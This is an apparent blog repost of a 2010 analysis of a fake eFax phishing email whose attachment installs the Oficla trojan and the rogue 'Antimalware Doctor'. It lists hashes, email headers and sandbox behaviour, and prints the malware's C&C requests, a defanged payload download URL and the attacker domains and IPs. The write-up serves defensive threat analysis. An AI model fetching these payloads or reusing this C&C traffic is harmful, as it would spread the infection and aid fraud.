We have received today morning an interesting email from eFax (fake), with a suspicious ZIP Archive file (.ZIP) attached, and the subject of the email stated we have received a fax “You’ve got a fax” … the strange part is that the ZIP file contains an executable file (.EXE) with the icon of MS WORD.
Report date: 2010-09-17 13:42:07 (GMT 1)
File name: efax-97901doc-exe
File size: 43008 bytes
MD5 hash: 5276e96227570b2bf6ec85a306db1027
SHA1 hash: 60fe4ecb7cb2b6e9c3173223c35b0fee3aa5149a
Detection rate: 6 on 16 (38%)
Status: INFECTED
The details of the message source of the received emails are as follow:
From: “eFax” efax(at)efax.com
Received: from efax.com (unknown [95.139.213.105])
Subject: You’ve got a fax
Date: Thu, 16 Sep 2010 15:36:03 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
We have executed the file in our sandbox and this is the file activity:
The file that has been created in system directory is named hyli.igo and it is the main executable file of the Oficla trojan that is used to control the victim’s computer and to install the rogue security software Antimalware Doctor.
Network Traffic:
GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1 User-Agent: Opera\9.64 Host: moneymader .ru
Response:
[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]
The malware connected to the C&C server of oficla trojan to receive new commands from the bot owner and from the reponse of the GET query we can see that the malware received the commands to update itself “upd:1″ with a new binary file located at “backurls:”.
And now we noticed that the oficla trojan started to download the Antimalware Doctor installer, we can see from the image below that it looks like an installer for the Microsoft Windows Updates, but it will install the rogue security software Antimalware Doctor instead:
Common symptoms of a rogue security software infection are always the repeated false security alerts that state the user’s system is infected by a large numbers of trojans and the user is then forced to click the button “Remove Threats” that will open the main program while execute a fakse system scan:
This is the main GUI of Antimalware Doctor:
Task manager has also been disabled:
New Network Traffic:
GET /inst.php?do=2&a=XXX&b=en&c=XXX&d=10&e=Win5.1.2600SP2 HTTP/1.1 Host: s.statst .in GET /load/load.php?a=XXX&b=en&c=XXX&e=Win5.1.2600SP2 HTTP/1.1 Host: statst .in GET /setup710binfile.exe HTTP/1.1 Host: outgtrf .in GET /install.php?do=1&coid=XXX&fff=XXX&IP=XXX&lct=ITA&v=X240 HTTP/1.1 Host: s.statst .in
Antimalware Doctor started to display fake security alerts that redirected to the website used to purchase this rogue security software, take in mind all the payment systems used by these rogues are fraudulent and in most cases can even steal credit card details that have been inserted during the payment process:
GET /purchase.php?aaa=csp&fff=XXX&sbb=X240-1-aftscann&lct=ITA&ttt=1&tns=1&sss=2&nocashe=1 HTTP/1.1 Host: statst .in
SSL Connection used during payments:
83.133.115.9:443
Domain & IP Analysis:
moneymader .ru / 109.196.134.44
91.204.48.46
outgtrf .in / 89.187.53.250
s.statst.in / 85.234.191.21
statst.in / 85.234.191.21
83.133.115.9
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
沒有留言:
張貼留言